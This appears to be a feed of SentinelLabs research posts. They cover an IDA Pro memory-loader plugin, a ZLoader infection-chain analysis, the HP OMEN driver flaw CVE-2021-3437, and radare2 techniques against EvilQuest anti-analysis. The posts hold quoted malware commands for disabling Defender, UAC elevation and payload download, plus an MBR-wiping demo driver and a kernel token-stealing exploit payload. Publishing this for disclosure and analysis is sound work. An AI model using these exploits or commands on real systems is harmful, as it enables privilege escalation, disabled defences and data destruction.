There are new articles available, click to refresh the page.
Before yesterdaySentinelLabs

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

25 March 2021 at 11:26

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed such that downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. If the researcher is actively investigating a sample and the AV throws a static detection, this can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you just might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in the graph in red, making it easier to spot them. The plugin feature runs after the IDA database is initialized, meaning there is already a binary loaded into the database. A loader loads a binary into the IDA database.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to extend further the loading capability of IDA Pro to load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL executable, where the memory loading capabilities are stored. Its main functionally is to take a buffer of bytes from a memory buffer and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to the disk. The loader accepts specific zip format files (.zip). After accepting a zip file, it will display the zip files and allow you to choose the file you want to work with.

MemZipLoader will extract the file from the input ZIP into a memory buffer and load it into IDA without writing it to disk and storing the encrypted zip file on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is always suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the file downloaded will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

  1. Download zip with binaries from here.
  2. Extract the zip files to a folder.
  3. Place the loaders in the loaders directory of IDA.
      1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
      2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)

  • Place the memory loader DLL in the IDA directory folder.
    1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:


  1. Open IDA and choose zip file.
  2. IDA should automatically suggest the loader:
  3. Once selected, a list of the files from the zip will be displayed:
  4. IDA will then use the loader code and load it as if the binary was a local file on the system.


  1. Open any file on your computer in a directory you have write privileges to.
  2. The UrlLoader will suggest a file to open.
  3. After you chose UrlLoader, you will be asked enter a URL:
  4. The loader will browse to the network location you entered. Then IDA Pro will use the loader code and load the binary as if it was a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

    1. Open a DLL project in Visual Studio
    2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is the file where the loader definition will be.
    3. accept_file – this function returns a boolean if the loader is relevant to the current binary that is being loaded into IDA. For example, if you are loading a PE, the build_loaders_list should return PE.dll as one of the loading options.

load_file – this function is responsible for loading a file into the database. For each loader this function acts differently, so there is not much to say here. Documentation on loaders can be found here.

  1. The project can be compiled into two versions x64 for IDA with x64 addresses, and x64 for IDA x64 with 32 bit addresses. From this point forward we will mark them:
    1. X64 | X64 – 64 bit IDA with 64 BIT addresses
    2. X32 | X64 – 64 bit IDA with 32 BIT addresses


  • Target file name (Configuration Properties -> Target Name)
    1. X64 | X64 – $(ProjectName)64
    2. X32 | X64 – $(ProjectName)
  • Include header files: (Similar in: (X64 | x64) and( X64 | X32)
    1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA PRO SDK.
    2. Set Runtime Library -> Multi-threaded Debug (/MTd)
  • Include lib files:
    1. X64 | X64
      1. idasdk75\lib\x64_win_vc_64
  • X64 | X32
    1. idasdk75\lib\x64_win_vc_32
    2. idasdk75\lib\x64_win_vc_64
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
    1. X64 | X64 add: __EA64__
    2. X32 | X64 add: __X64__, __NT__
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
    1. X32 | X64: __EA64__
  • Conclusion

    When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that the endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to the disk.

    Using the Memory Loader plugin also saves you time analyzing binaries. When working with malicious content in IDA Pro often a different environment is created for it, usually in a virtual machine. Copying the binary and setting up the machine for research every time you want to open IDA is time-expensive. The Memory Loader plugin will allow you to work from your machine in a safer and more productive way.

    Please note that a IDA professional license is needed to use and develop extensions for IDA Pro.

    The SentinelOne IDA Pro Memory Loader Plugin is available on Github.


The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.

Hide and Seek | New Zloader Infection Chain Comes With Improved Stealth and Evasion Mechanisms

13 September 2021 at 16:33

By Antonio Pirozzi and Antonio Cocomazzi

Executive Summary

  • New ZLoader campaign has a stealthier distribution mechanism which deploys a signed dropper with lower rates of detection.
  • The campaign primarily targets users of Australian and German banking institutions.
  • The new infection chain implements a stager which disables all Windows Defender modules.
  • The threat actor uses a backdoored version of the Windows utility wextract.exe to embed the ZLoader payload and lower the chance of detection.
  • SentinelLabs identified the entire infrastructure of the ‘Tim’ botnet, composed of more than 350 recently-registered C2 domains.

Read the Full Report


ZLoader (also known as Terdot) was first discovered in 2016 and is a fork of the infamous Zeus banking trojan. It is still under active development. A multitude of different versions have appeared since December 2019, with an average frequency of 1-2 new versions released each week.

ZLoader is a typical banking trojan which implements web injection to steal cookies, passwords and any sensitive information. It attacks users of financial institutions all over the world and has also been used to deliver ransomware families like Egregor and Ryuk. It also provides backdoor capabilities and acts as a generic loader to deliver other forms of malware. Newer versions implement a VNC module which permits users to open a hidden channel that gives the operators remote access to victim systems. ZLoader relies primarily on dynamic data exchange (DDE) and macro obfuscation to deliver the final payload through crafted documents.

A recent evolution of the infection chain included the dynamic creation of agents, which download the payload from a remote server. The new infection chain observed by SentinelLabs demonstrates a higher level of stealth by disabling Windows Defender and relying on living-off-the-land binaries and scripts (LOLBAS) in order to evade detection. During our investigation, we were also able to map all the new ZLoader C2 infrastructure related to the ‘Tim’ botnet and identify the scope of the campaign and its objectives, which primarily involved stealing bank credentials from customers of European banks.

Overview of the ZLoader infection chain

Technical Analysis

The malware is downloaded from a Google advertisement published through Google Adwords. In this campaign, the attackers use an indirect way to compromise victims instead of using the classic approach of compromising the victims directly, such as by phishing.

We observed the following pattern of activity that leads to infection:

  • The user performs a search on to find a website to download the required software from; in our case, we observed a search for “team viewer download”.
  • The user clicks on an advertisement shown by Google and is redirected to the fake TeamViewer site under the attacker’s control.
  • The user is tricked into downloading the fake software in a signed MSI format.

Once the user clicks on the advertisement, it will redirect through the aclk page. This redirect demonstrates the attackers usage of Google Adwords to gain traffic:


After further navigation (and redirects), the malicious Team-Viewer.msi is downloaded from the final URL hxxps://

The downloaded file is a fake TeamViewer installer signed on 2021-08-23 10:07:00. It appears that the cybercriminals managed to obtain a valid certificate issued by Flyintellect Inc, a Software company in Brampton, Canada. The company was registered on 29th June 2021, suggesting that the threat actor possibly registered the company for the purpose of obtaining those certificates.

Pivoting from this certificate, we were able to spot other samples signed with the same certificate. These other samples suggest that the attackers had multiple campaigns ongoing beyond TeamViewer and which included fakes such as JavaPlug-in.mis, Zoom.mis, and discord.msi.

At the time of writing, these four samples have no detections on VirusTotal (a complete list of IoCs can be found in the full report).

New Zloader Infection Chain Bypass Defences

The .msi file is the first stage dropper which runs an installation wizard. It creates random legitimate files in the directory C:\Program Files (x86)\Sun Technology Network\Oracle Java SE. Once the folder has been created, it will drop the setup.bat file, triggering the initial infection chain by executing cmd.exe /c setup.bat.

This initiates the second stage of the infection chain, downloading the dropper updatescript.bat through the PowerShell cmdlet Invoke-WebRequest, from hxxps:// The dropper then executes the third stage with the command cmd /c updatescript.bat.

The third stage dropper contains most of the logic to impair the defenses of the machine. It also drops the fourth stage using a stealthy execution technique. At first, it disables all the Windows Defender modules through the PowerShell cmdlet Set-MpPreference. It then adds exclusions, such as regsvr32, *.exe, *.dll, with the cmdlet Add-MpPreference to hide all the components of the malware from Windows Defender.

At this point the fourth stage dropper is downloaded from the URL hxxps:// and saved as tim.exe. The execution of tim.exe is done through the LOLBAS command explorer.exe tim.exe. This allows the attacker to break the parent/child correlation often used by EDRs for detection.

The first part of the attack chain

The tim.exe binary is a backdoored version of the Windows utility wextract.exe. This backdoored version contains extra embedded resources with names like “RUNPROGRAM”, “REBOOT”, and “POSTRUNPROGRAM”, among others.

Resources embedded in the tim.exe binary (left) and legit wextract.exe(right)

This backdoored version contains additional code for creating a new malicious batch file with the name tim.bat. It is placed in a temporary directory retrieved with the Win32 function GetTempPath(). It retrieves the content of the resource “RUNPROGRAM” (containing the string value cmd /c tim.bat) and uses it as the command line parameter for the CreateProcess() Win32 function.

The tim.bat file is a very short script that downloads the final ZLoader DLL payload with the name tim.dll from the URL hxxps:// and executes it through the LOLBAS command regsvr32 tim.dll. This allows the attackers to proxy the execution of the DLL through a signed binary by Microsoft.

This dropper downloads the script nsudo.bat from hxxps:// and runs asynchronously in parallel with the execution of tim.dll. The script aims to further impair defenses of the machine.

Privilege Escalation and Defense Evasion

The nsudo.bat script performs multiple operations with the goal of elevating privileges on the system and impairing defenses.

At first, it checks if the current context of execution is privileged by verifying the access to the SYSTEM hive. This is done through %SYSTEMROOT%\system32\cacls.exe  %SYSTEMROOT%\system32\config\system. If the process in which it runs has no access on that hive it will jump to the label :UACPrompt.

This part of the script implements an auto elevation VBScript that aims to run an elevated process in order to make system changes. The snippet of the script in charge of the UACPrompt feature is as follows:

      echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
      set params = %*:"="
      echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
      del "%temp%\getadmin.vbs"
      exit /B

This snippet creates the VBScript getadmin.vbs, runs it and deletes it. Using a VBScript eases the interaction with COM objects. In this case, it instantiates a Shell.Application object and calls the function ShellExecute() to trigger the UAC elevation and the interaction with the AppInfo service.

Once the elevation occurs the script is run with elevated privileges. At this point, the script performs the steps to disable Windows Defender. It does this through a software utility called NSudo renamed as javase.exe, which is downloaded from the URL hxxps:// The attacker leverages this utility in order to spawn a process with “TrustedInstaller” privileges. This can be abused by the attacker to disable the Windows Defender service even if it runs as a Protected Process Light.

The script downloads the file autorun100.bat from and places it in the startup folder %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. This script ensures that the WinDefend service is deleted at the next boot through the utility NSudo.

The nsudo.bat script also completely disables UAC by setting the following registry key to 0:


In order to have these changes take effect, the computer is forced to restart. The nsudo.bat script does this with shutdown.exe /r /f /t 00. At this point, the attack chain of the script nsudo.bat is complete.

ZLoader Payload Execution Chain

The tim.dll is the main ZLoader payload that encapsulates the unpacking logic and adds persistence. It is executed through the system signed binary regsvr32.exe.

It first creates a directory with a random name inside %APPDATA% and then creates a copy of itself in the newly created directory. It then adds a new registry key in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. The registry key value contains the command line of the malicious process to spawn on user logon. This ensures that the attacker’s implant survives machine reboots. The DLL execution also relies on the regsvr32 binary. This is an example of the registry key created on a single run of the sample:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Iwalcacvalue: regsvr32.exe /s C:\Users\[REDACTED]\AppData\Roaming\Kyubt\otcyovw.dll

Then it starts the unpacking by leveraging a process injection technique known as Thread Hijacking. It contains a small variation but essentially uses the same pattern of Win32 API calls used for Thread Hijacking:

VirtualAllocEx() -> WriteProcessMemory() -> GetThreadContext() -> SetThreadContext() -> ResumeThread()

It first creates a new process as a host for the unpacked DLL, and for this sample it uses a new instance of msiexec.exe. Then it allocates and writes 2 RWX memory regions inside the target process. One contains the unpacked version of the DLL XOR’ed with a key; the second, contains some shellcode to decrypt the DLL and jump to the entry point.

The unpacking routine

Once the memory is written in the remote process it sets the new thread context EIP to point to the unpacking routine shellcode and resumes the main thread of msiexec. This is how the hijacking of the main thread occurs. The unpacked DLL is extracted from the memory of msiexec.exe process by dumping the memory address used in the first WriteProcessMemory() call.

We have compared the unpacked DLL with the recent ZLoader payloads and found a similarity score of 92.62%.

Final part of the attack chain

Analyzing The New Zloader C2 Infrastructure

The analyzed sample belongs to the ‘Tim’ Botnet as defined in the malware configuration. Some of the embedded C2s (the full list can be found in the IoC section of the full report) are also shared by the googleaktualizacija ZLoader botnet.

One of the C2s dumped from the infected machine, mjwougyhwlgewbajxbnn[.]com, used to resolve to 194.58.108[.]89 until the 25th of August 2021. As of the 26th of August, however, it points to 195.24.66[.]70.

The IP 194.58.108[.]89 belongs to ASN 48287 – RU-CENTER and seems to deploy many different domains – 350 at the time of writing – forming the new ZLoader infrastructure. Some domains implement the gate.php component, which is a fingerprint of the ZLoader botnet. We noticed during our investigation that all the domains were registered from April to Aug 2021, and they switched to the new IP (195.24.66[.]70) on the 26th of August.

A Targeted Campaign: AU And DE Financial Institutions

The new ZLoader campaign is targeted. The final payload has a list of embedded AU and DE domains, and contains some strings with wildcards used by the malware to intercept specific users’ web requests to bank portals.


From our analysis of the communication patterns related to mjwougyhwlgewbajxbn[.]com, we were able to map most of the source traffic used by the operators of the botnet.

The pornofilmspremium[.]com domain delivers the tim.exe component. The domain was registered on 2021-07-19 (Location RU, ASN: REG RU 197695) and is associated by the community with ZLoader [1, 2]. The email address [email protected][.]com was used to register this domain and a number of others, as detailed in the full report.


The attack chain analyzed in this research shows how the complexity of the attack has grown in order to reach a higher level of stealthiness. The first stage dropper has been changed from the classic malicious document to a stealthy, signed MSI payload. It uses backdoored binaries and a series of LOLBAS to impair defenses and proxy the execution of their payloads.

This is the first time we have observed this attack chain in a ZLoader campaign. At the time of writing, we have no evidence that the delivery chain has been implemented by a specific affiliate or if it was provided by the main operator. SentinelLabs continues to monitor this threat in order to track further activity.

Indicators of Compromise

For a full list of IoCS see the full report.

Read the Full Report

Read the Full Report

We thank Awais Munir for his assistance in the technical analysis of the Zloader campaign.

CVE-2021-3437 | HP OMEN Gaming Hub Privilege Escalation Bug Hits Millions of Gaming Devices

14 September 2021 at 11:00

Executive Summary

  • SentinelLabs has discovered a high severity flaw in an HP OMEN driver affecting millions of devices worldwide.
  • Attackers could exploit these vulnerabilities to locally escalate to kernel-mode privileges. With this level of access, attackers can disable security products, overwrite system components, corrupt the OS, or perform any malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to HP on Feb 17, 2021 and the vulnerability is tracked as CVE-2021-3437, marked with CVSS Score 7.8.
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.


HP OMEN Gaming Hub, previously known as HP OMEN Command Center, is a software product that comes preinstalled on HP OMEN desktops and laptops. This software can be used to control and optimize settings such as device GPU, fan speeds, CPU overclocking, memory and more. The same software is used to set and adjust lighting and other controls on gaming devices and accessories such as mouse and keyboard.

Following on from our previous research into other HP products, we discovered that this software utilizes a driver that contains vulnerabilities that could allow malicious actors to achieve a privilege escalation to kernel mode without needing administrator privileges.

CVE-2021-3437 essentially derives from the HP OMEN Gaming Hub software using vulnerable code partially copied from an open source driver. In this research paper, we present details explaining how the vulnerability occurs and how it can be mitigated. We suggest best practices for developers that would help reduce the attack surface provided by device drivers with exposed IOCTLs handlers to low-privileged users.

Technical Details

Under the hood of HP OMEN Gaming Hub lies the HpPortIox64.sys driver, C:\Windows\System32\drivers\HpPortIox64.sys. This driver is developed by HP as part of OMEN, but it is actually a partial copy of another problematic driver, WinRing0.sys, developed by OpenLibSys.

The link between the two drivers can readily be seen as on some signed HP versions the metadata information shows the original filename and product name:

File Version information from CFF Explorer

Unfortunately, issues with the WinRing0.sys driver are well-known. This driver enables user-mode applications to perform various privileged kernel-mode operations via IOCTLs interface.

The operations provided by the HpPortIox64.sys driver include read/write kernel memory, read/write PCI configurations, read/write IO ports, and MSRs. Developers may find it convenient to expose a generic interface of privileged operations to user mode for stability reasons by keeping as much code as possible from the kernel-module.

The IOCTL codes 0x9C4060CC, 0x9C4060D0, 0x9C4060D4, 0x9C40A0D8, 0x9C40A0DC and 0x9C40A0E0 allow user mode applications with low privileges to read/write 1/2/4 bytes to or from an IO port. This could be leveraged in several ways to ultimately run code with elevated privileges in a manner we have previously described here.

The following image highlights the vulnerable code that allows unauthorized access to IN/OUT instructions, with IN instructions marked in red and OUT instructions marked in blue:

The Vulnerable Code – unauthorized access to IN/OUT instructions

Since I/O privilege level (IOPL) equals the current privilege level (CPL), it is possible to interact with peripheral devices such as internal storage and GPU to either read/write directly to the disk or to invoke Direct Memory Access (DMA) operations. For example, we could communicate with ATA port IO for directly writing to the disk, then overwrite a binary that is loaded by a privileged process.

For the purposes of illustration, we wrote this sample driver to demonstrate the attack without pursuing an actual exploit:

unsigned char port_byte_in(unsigned short port) {
	return __inbyte(port);

void port_byte_out(unsigned short port, unsigned char data) {
	__outbyte(port, data);

void port_long_out(unsigned short port, unsigned long data) {
	__outdword(port, data);

unsigned short port_word_in(unsigned short port) {
	return __inword(port);

#define BASE 0x1F0

void read_sectors_ATA_PIO(unsigned long LBA, unsigned char sector_count) {
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x20); //Send the read command

	for (int j = 0; j < sector_count; j++) {
		for (int i = 0; i < 256; i++) { USHORT a = port_word_in(BASE); DbgPrint("0x%x, ", a); } } } void write_sectors_ATA_PIO(unsigned char LBA, unsigned char sector_count) { ATA_wait_BSY(); port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x30);

	for (int j = 0; j < sector_count; j++)
		for (int i = 0; i < 256; i++) { port_long_out(BASE, 0xffffffff); } } } static void ATA_wait_BSY() //Wait for bsy to be 0 { while (port_byte_in(BASE + 7) & STATUS_BSY); } static void ATA_wait_DRQ() //Wait fot drq to be 1 { while (!(port_byte_in(BASE + 7) & STATUS_RDY)); } NTSTATUS DriverEntry(PDRIVER_OBJECT driver_object, PUNICODE_STRING registry) { UNREFERENCED_PARAMETER(registry); driver_object->DriverUnload = drv_unload;

	DbgPrint("Before: \n");
	read_sectors_ATA_PIO(0, 1);
	write_sectors_ATA_PIO(0, 1);
	DbgPrint("\nAfter: \n");
	read_sectors_ATA_PIO(0, 1);


This ATA PIO read/write is based on LearnOS. Running this driver will result in the following DebugView prints:

Debug logging from the driver in DbgView utility

Trying to restart this machine will result in an ‘Operating System not found’ error message because our demo driver destroyed the first sector of the disk (the MBR).

The machine fails to boot due to corrupted MBR

It’s worth mentioning that the impact of this vulnerability is platform dependent. It can potentially be used to attack device firmware or perform legacy PCI access by accessing ports 0xCF8/0xCFC. Some laptops may have embedded controllers which are reachable via IO port access.

Another interesting vulnerability in this driver is an arbitrary MSR read/write, accessible via IOCTLs 0x9C402084 and 0x9C402088. Model-Specific Registers (MSRs) are registers for querying or modifying CPU data. RDMSR and WRMSR are used to read and write to MSR accordingly. Documentation for WRMSR and RDMSR can be found on Intel(R) 64 and IA-32 Architecture Software Developer’s Manual Volume 2 Chapter 5.

In the following image, arbitrary MSR read is marked in green, MSR write in blue, and HLT is marked in red (accessible via IOCTL 0x9C402090, which allows executing the instruction in a privileged context).

Vulnerable code with unauthorized access to MSR registers

Most modern systems only use MSR_LSTAR during a system call transition from user-mode to kernel-mode:

MSR_LSTAR MSR register in WinDbg

It should be noted that on 64-bit KPTI enabled systems, LSTAR MSR points to nt!KiSystemCall64Shadow.

The entire transition process looks something like as follows:

The entire process of transition from the User Mode to Kernel mode

These vulnerabilities may allow malicious actors to execute code in kernel mode very easily, since the transition to kernel-mode is done via an MSR. This is basically an exposed WRMSR instruction (via IOCTL) that gives an attacker an arbitrary pointer overwrite primitive. We can overwrite the LSTAR MSR and achieve a privilege escalation to kernel mode without needing admin privileges to communicate with this device driver.

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without ACLs enforcements (note: Some drivers handle access to devices independently in IRP_MJ_CREATE routines):

Using DeviceTree software to examine the security descriptor of the device
The function that handles IOCTLs to write to arbitrary MSRs

Weaponizing this kind of vulnerability is trivial as there’s no need to reinvent anything; we just took the msrexec project and armed it with our code to elevate our privileges.

Our payload to elevate privileges:

	//extern "C" void elevate_privileges(UINT64 pid);
	//DWORD current_process_id = GetCurrentProcessId();
	vdm::msrexec_ctx msrexec(_write_msr);
	msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void
		const auto dbg_print = reinterpret_cast(get_kroutine(krnl_base, "DbgPrint"));
		const auto ex_alloc_pool = reinterpret_cast(get_kroutine(krnl_base, "ExAllocatePool"));

		dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000));
		dbg_print("> cr4 -> 0x%p\n", __readcr4());

The assembly payload:

elevate_privileges proc
	push rsi
	mov rsi, rcx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, 4
	jnz __findsys

	mov rax, rbx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]

	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, rsi
	jnz __findarg

	mov rcx, [rax + 4b8h]
	and cl, 0f0h
	mov [rbx + 4b8h], rcx

	xor rax, rax
	pop rsi
elevate_privileges endp

Note that this payload is written specifically for Windows 10 20H2.

Let’s see what it looks like in action.

OMEN Gaming Hub Privilege Escalation

Initially, HP developed a fix that verifies the initiator user-mode applications that communicate with the driver. They open the nt!_FILE_OBJECT of the callee, parsing its PE and validating the digital signature, all from kernel mode. While this in itself should be considered unsafe, their implementation (which also introduced several additional vulnerabilities) did not fix the original issue. It is very easy to bypass these mitigations using various techniques such as “Process Hollowing”. Consider the following program as an example:

int main() {

    puts("Opening a handle to HpPortIO\r\n");


    if (hDevice == INVALID_HANDLE_VALUE) {

        printf("failed! getlasterror: %d\r\n", GetLastError());

        return -1;


    printf("succeeded! handle: %x\r\n", hDevice);

    return -1;


Running this program against the fix without Process Hollowing will result in:

    Opening a handle to HpPortIO failed! 
    getlasterror: 87

While running this with Process Hollowing will result in:

    Opening a handle to HpPortIO succeeded! 
    handle: <HANDLE>

It’s worth mentioning that security mechanisms such as PatchGuard and security hypervisors should mitigate this exploit to a certain extent. However, PatchGuard can still be bypassed. Some of its protected structure/data are MSRs, but since PatchGuard samples these assets periodically, restoring the original values very quickly may enable you to bypass it.


An exploitable kernel driver vulnerability can lead an unprivileged user to SYSTEM, since the vulnerable driver is locally available to anyone.

This high severity flaw, if exploited, could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products.

An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use these vulnerabilities to gain local elevation of privileges. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement.

Impacted products:

  • HP OMEN Gaming Hub prior to version is affected
  • HP OMEN Gaming Hub SDK Package prior 1.0.44 is affected

Development Suggestions

To reduce the attack surface provided by device drivers with exposed IOCTLs handlers, developers should enforce strong ACLs on device objects, verify user input and not expose a generic interface to kernel mode operations.


HP released a Security Advisory on September 14th to address this vulnerability. We recommend customers, both enterprise and consumer, review the HP Security Advisory for complete remediation details.


This high severity vulnerability affects millions of PCs and users worldwide. While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, using any OMEN-branded PC with the vulnerable driver utilized by OMEN Gaming Hub makes the user potentially vulnerable. Therefore, we urge users of OMEN PCs to ensure they take appropriate mitigating measures without delay.

We would like to thank HP for their approach to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline

17, Feb, 2021 – Initial report
17, Feb, 2021 – HP requested more information
14, May, 2021 – HP sent us a fix for validation
16, May, 2021 – SentinelLabs notified HP that the fix was insufficient
07, Jun, 2021 – HP delivered another fix, this time disabling the whole feature
27, Jul, 2021 – HP released an update to the software on the Microsoft Store
14, Sep 2021 – HP released a security advisory for CVE-2021-3437
14, Sep 2021 – SentinelLabs’ research published

Defeating macOS Malware Anti-Analysis Tricks with Radare2

20 September 2021 at 16:47

In this second post in our series on intermediate to advanced macOS malware reversing, we start our journey into tackling common challenges when dealing with macOS malware samples. Last time out, we took a look at how to use radare2 for rapid triage, and we’ll continue using r2 as we move through these various challenges. Along the way, we’ll pick up tips on both how to beat obstacles put in place by malware authors and how to use r2 more productively.

Although we can achieve a lot from static analysis, sometimes it can be more efficient to execute the malware in a controlled environment and conduct dynamic analysis. Malware authors, however, may have other ideas and can set up various roadblocks to stop us doing exactly that. Consequently, one of the first challenges we often have to overcome is working around these attempts to prevent execution in our safe environment.

In this post, we’ll look at how to circumvent the malware author’s control flow to avoid executing unwanted parts of their code, learning along the way how to take advantage of some nice features of the r2 debugger! We’ll be looking at a sample of EvilQuest (password: infect3d), so fire up your VM and download it before reading on.

A note for the unwary: if you’re using Safari in your VM to download the file and you see “decompression failed”, go to Safari Preferences and turn off the ‘Open “safe” files after downloading’ option in the General tab and try the download again.

Getting Started With the radare2 Debugger

Our sample hit the headlines in July 2020, largely because at first glance it appeared to be a rare example of macOS ransomware. SentinelLabs quickly analyzed it and produced a decryptor to help any potential victims, but it turned out the malware was not very effective in the wild.

It may well have been a PoC, or a project still in early development stages, as the code and functionality have the look and feel of someone experimenting with how to achieve various attacker objectives. However, that’s all good news for us, as EvilQuest implements several anti-analysis features that will serve us as good practice.

The first thing you will want to do is remove any extended attributes and codesigning if the sample has a revoked signature. In this case, the sample isn’t signed at all, but if it were we could use:

% sudo codesign --remove-signature <path to bundle or file>

If we need the sample to be codesigned for execution, we can also sign it (remember your VM needs to have installed the Xcode command line tools via xcode-select --install) with:

% sudo codesign -fs - <path to bundle or file> --deep

We’ll remove the extended attributes to bypass Gatekeeper and Notarization checks with

% xattr -rc <path to bundle or file>

And we’ll attempt to attach to the radare2 debugger by adding the -d switch to our initialization command:

% r2 -AA -d patch

Unfortunately, our first attempt doesn’t go well. We already removed the extended attributes and codesigning isn’t the issue here, but the radare2 debugger fails to attach.

Failing to attach the debugger.

That ptrace: Cannot Attach: Invalid argument looks ominous, but actually the error message is misleading. The problem is that we need elevated privileges to debug, so a simple sudo should get us past our current obstacle.

The debugger needs elevated privileges

Yay, attach success! Let’s take a look around before we start diving further into the debugger.

A Faster Way of Finding XREFS and Interesting Code

Let’s run afll as we did when analyzing OSX.Calisto previously, but this time we’ll output the function list to file so that we can sort it and search it more conveniently without having to keep running the command or scrolling up in the Terminal window.

> afll > functions.txt

Looking through our text file, we can see there are a number of function names that could be related to some kind of anti-analysis.

Some of EvilQuest’s suspected anti-analysis functions

We can see that some of these only have a single cross-reference, and if we dig into these using the axt commmand, we see the cross-reference (XREF) for the is_virtual_mchn function happens to be main(), so that looks a good place to start.

Getting help on radare2’s axt command
> axt sym._is_debugging
main 0x10000be5f [CALL] sys._is_virtual_mchn
Many commands in r2 support tab expansion

Here’s a useful powertrick for those already comfortable with r2. You can run any command on a for-each loop using @@. For example, with

axt @@f:<search term>

we can get the XREFS to any function containing the search term in one go.

In this case I tell r2 to give me the XREFS for every function that contains “_is_”. Then I do the same with “get”. Try @@? to see more examples of what you can do with @@.

Using a for-each in radare2

Since we see that is_virtual_mchn is called in main, we should start by disassembling the entire main function to see what’s going on, but first I’m going to change the r2 color theme to something a bit more reader-friendly with the eco command (try eco and hit the tab key to see a list of available themes).

eco focus
pdf @ main

Visual Graph Mode and Renaming Functions with Radare2

As we scroll back up to the beginning of the function, we can see the disassembly provides pretty interesting reading. At the beginning of main, we can see some unnamed functions are called. We’re going to jump into Visual Graph mode and start renaming code as this will give us a good idea of the malware’s execution flow and indicate what we need to do to beat the anti-analysis.

Hit VV to enter Visual Graph mode. I will try to walk you through the commands, but if you get lost at any point, don’t feel bad. It happens to us all and is part of the r2 learning curve! You can just quit out and start again if needs be (part of the beauty of r2’s speed; you can also save your project: type uppercase P? to see project options).

I prefer to view the graph as a horizontal, left-to-right flow; you can toggle between horizontal and vertical by pressing the @ key.

